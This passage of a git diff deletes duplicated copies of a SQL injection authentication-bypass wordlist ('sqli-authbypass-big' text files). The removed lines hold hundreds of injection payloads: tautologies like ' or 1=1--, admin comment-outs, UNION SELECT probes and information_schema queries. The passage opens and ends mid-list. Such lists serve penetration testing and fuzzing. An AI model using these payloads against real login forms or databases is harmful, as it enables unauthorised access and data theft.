-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
